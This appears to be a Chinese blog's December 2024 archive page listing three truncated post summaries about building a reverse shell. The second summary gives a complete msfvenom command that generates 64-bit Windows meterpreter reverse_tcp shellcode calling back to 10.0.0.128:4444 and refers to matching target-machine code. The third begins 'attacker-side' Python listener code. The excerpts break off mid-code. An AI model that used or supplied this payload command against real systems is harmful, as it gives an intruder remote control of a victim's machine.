12 2024 档案
摘要:python -m http.server 8000
阅读全文
摘要:msf生成64位shellcode代码如下 msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.0.0.128 LPORT=4444 -f py 32位我忘记了,自己去试 攻击端代码不变,请看上一篇 64位目标机代码如下 #!/usr/b
阅读全文
摘要:攻击端代码 import socket# 创建一个TCP socketserver = socket.socket(socket.AF_INET, socket.SOCK_STREAM)# 设置监听的IP和端口host = '0.0.0.0' # 监听所有网络接口port = 444 # 监听端口#
阅读全文